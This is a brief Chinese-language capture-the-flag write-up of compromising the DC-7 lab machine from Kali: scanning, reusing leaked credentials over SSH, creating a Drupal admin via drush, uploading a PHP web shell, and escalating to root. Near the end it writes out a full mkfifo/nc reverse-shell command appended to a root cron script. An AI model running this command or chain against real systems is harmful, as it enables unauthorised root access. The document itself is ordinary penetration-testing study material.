Kali渗透DC7

相同步骤，从官网下载靶机，设置网卡为nat开始靶机，同时启动Kali，使用nmap发现主机

得到主机地址，进一步扫描，搜集靶机开启的服务与端口

 

靶机开启了ssh服务22端口，http服务80端口。

打开浏览器访问靶机http服务

 

成功访问，发现搜索框，继续搜集信息查看是否有sql注入等漏洞

 

 

发现登陆框，但没有注入漏洞无法登陆，发现网页下面有dc7user，搜索信息

 

 

 

发现源码，查看配置源码

 

得到一个账户名与密码，尝试登录该网页

 

登录失败，再次尝试通过ssh登录靶机

 

成功登陆！查看用户信息，逐个查看文件

 

最终在该用户目录下发现mbox 文件，信息提示/opt/scripts/backups.sh该文件可以以dc7的root权限执行，查看该文件内容

百度查询文件中的drush 命令可以帮我们创建用户。

进入/bar/www/html使用该命令创建用户

成功创建，尝试登录靶机的http服务

 

 

成功登陆，尝试寻找上传路径，进行木马上传

 

发现无法上传，该网页不支持php 文件，尝试安装插件，

 

 

 

成功安装插件，尝试Php木马上传靶机网站是否执行

 

 

成功执行，打开Kali ssh尝试木马链接

 

 

链接成功，输入命令获得交互界面

 

查看文件

发现backups.sh 在该用户目录下。

用命令echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.172.131 2345 >/tmp/f" >> backups.sh将反dshell的命令写入到backups.sh文件中，当它定时自动执行时即可执行其中的反dshell语句，即可反d回shell，返回之后既是root权限，在root目录下找到flag。